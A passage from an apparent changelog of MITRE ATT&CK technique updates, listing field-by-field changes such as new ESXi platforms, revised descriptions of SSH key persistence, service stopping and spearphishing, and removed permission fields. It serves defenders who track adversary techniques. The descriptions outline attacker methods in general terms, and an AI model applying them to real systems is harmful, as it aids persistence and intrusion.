external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
x_mitre_platforms | | ESXi |
[T1098.004] Account Manipulation: SSH Authorized Keys
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-03 17:38:21.121000+00:00 | 2025-04-15 19:58:39.342000+00:00 |
description | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys (or, on ESXi, `/etc/ssh/keys-/authorized_keys`).(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation: Broadcom ESXi SSH) The SSH config file is usually located under /etc/ssh/sshd_config .
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Broadcom ESXi SSH', 'description': 'Broadcom. (2024, December 12). Allowing SSH access to VMware vSphere ESXi/ESX hosts with public/private key authentication. Retrieved March 26, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/313767/allowing-ssh-access-to-vmware-vsphere-es.html'} |
x_mitre_platforms | | ESXi |
[T1563.001] Remote Service Session Hijacking: SSH Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['root'] | |
x_mitre_system_requirements | ['SSH service enabled, trust relationships configured, established connections'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-23 23:11:24.682000+00:00 | 2025-04-15 21:40:37.838000+00:00 |
external_references[3]['description'] | Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017. | Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking | https://web.archive.org/web/20210311184303/https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/ |
external_references[4]['description'] | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020. | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved November 17, 2024. |
external_references[4]['url'] | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/ |
x_mitre_version | 1.0 | 1.1 |
[T1562.009] Impair Defenses: Safe Mode Boot
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host Intrusion Prevention Systems', 'Anti-virus'] | |
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-31 14:51:47.352000+00:00 | 2025-04-15 19:58:15.415000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1053.005] Scheduled Task/Job: Scheduled Task
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-13 16:13:47.770000+00:00 | 2025-04-15 19:58:01.010000+00:00 |
x_mitre_version | 1.6 | 1.7 |
[T1053] Scheduled Task/Job
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['SYSTEM', 'Administrator', 'User'] | |
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:14:03.453000+00:00 | 2025-04-15 21:41:11.473000+00:00 |
x_mitre_remote_support | True | False |
x_mitre_version | 2.3 | 2.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1546.002] Event Triggered Execution: Screensaver
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-28 18:17:34.185000+00:00 | 2025-04-16 20:37:21.356000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1547.005] Boot or Logon Autostart Execution: Security Support Provider
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-25 15:42:48.910000+00:00 | 2025-04-15 19:58:30.225000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1505] Server Software Component
Current version: 1.5
Version changed from: 1.4 → 1.5
New Mitigations:
New Detections:
- DS0017: Command (Command Execution)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-19 21:18:29.349000+00:00 | 2025-04-16 20:37:21.713000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Command: Command Execution |
x_mitre_platforms | | ESXi |
[T1648] Serverless Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:17.861000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1569.002] System Services: Service Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:41:40.247000+00:00 | 2025-04-15 19:59:20.444000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1489] Service Stop
Current version: 1.3
Version changed from: 1.2 → 1.3
Description:
Old value | New Value |
---|---|
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of high importance to an organization, such as `MSExchangeIS`, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of high importance to an organization, such as `MSExchangeIS`, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-12 15:57:27.380000+00:00 | 2025-04-15 19:58:12.942000+00:00 |
description | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS , which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS , which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
x_mitre_platforms | | ESXi |
[T1574.010] Hijack Execution Flow: Services File Permissions Weakness
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['SYSTEM', 'Administrator', 'User'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:37.026000+00:00 | 2025-04-16 20:37:18.533000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application Control'] | |
x_mitre_effective_permissions | ['SYSTEM'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:42:48.016000+00:00 | 2025-04-15 19:58:09.308000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-15 18:43:20.995000+00:00 | 2025-04-16 20:37:17.707000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1129] Shared Modules
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-12 21:17:14.868000+00:00 | 2025-04-15 19:58:04.668000+00:00 |
x_mitre_version | 2.2 | 2.3 |
[T1547.009] Boot or Logon Autostart Execution: Shortcut Modification
Current version: 1.3
Version changed from: 1.2 → 1.3
Description:
Old value | New Value |
---|---|
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware. |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 13:41:16.110000+00:00 | 2025-04-15 19:58:28.507000+00:00 |
description | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware. |
x_mitre_version | 1.2 | 1.3 |
[T1558.002] Steal or Forge Kerberos Tickets: Silver Ticket
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-25 21:46:46.831000+00:00 | 2025-04-15 19:59:10.698000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1072] Software Deployment Tools
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:49:37.227000+00:00 | 2025-04-15 19:58:51.465000+00:00 |
x_mitre_version | 3.1 | 3.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1518] Software Discovery
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 00:16:06.689000+00:00 | 2025-04-15 19:59:16.123000+00:00 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1027.002] Obfuscated Files or Information: Software Packing
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Heuristic detection', 'Signature-based detection'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:48.113000+00:00 | 2025-04-16 20:37:22.038000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1036.006] Masquerading: Space after Filename
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:52.873000+00:00 | 2025-04-16 20:37:22.189000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1598.002] Phishing for Information: Spearphishing Attachment
Current version: 1.2
Version changed from: 1.1 → 1.2
Description:
Old value | New Value |
---|---|
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email. In some cases, they may rely upon the recipient populating information, then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. In other cases, adversaries may leverage techniques such as [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) to harvest user credentials via fake login portals.(Citation: Huntress HTML Smuggling 2024) Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-05-31 04:18:44.568000+00:00 | 2025-04-15 19:58:49.390000+00:00 |
description | Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email. In some cases, they may rely upon the recipient populating information, then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. In other cases, adversaries may leverage techniques such as [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) to harvest user credentials via fake login portals.(Citation: Huntress HTML Smuggling 2024)
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Huntress HTML Smuggling 2024', 'description': 'Matt Kiely. (2024, July 5). Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the Middle Tradecraft. Retrieved March 18, 2025.', 'url': 'https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft'} |
[T1566.004] Phishing: Spearphishing Voice
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:06:47.134000+00:00 | 2025-04-15 19:59:02.243000+00:00 |
description | Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing) | Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing) |
x_mitre_version | 1.1 | 1.2 |
[T1132.001] Data Encoding: Standard Encoding
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-03 00:31:33.071000+00:00 | 2025-04-16 20:37:14.817000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1037.005] Boot or Logon Initialization Scripts: Startup Items
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 16:43:21.560000+00:00 | 2025-04-16 20:37:20.168000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1528] Steal Application Access Token
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:49.300000+00:00 |
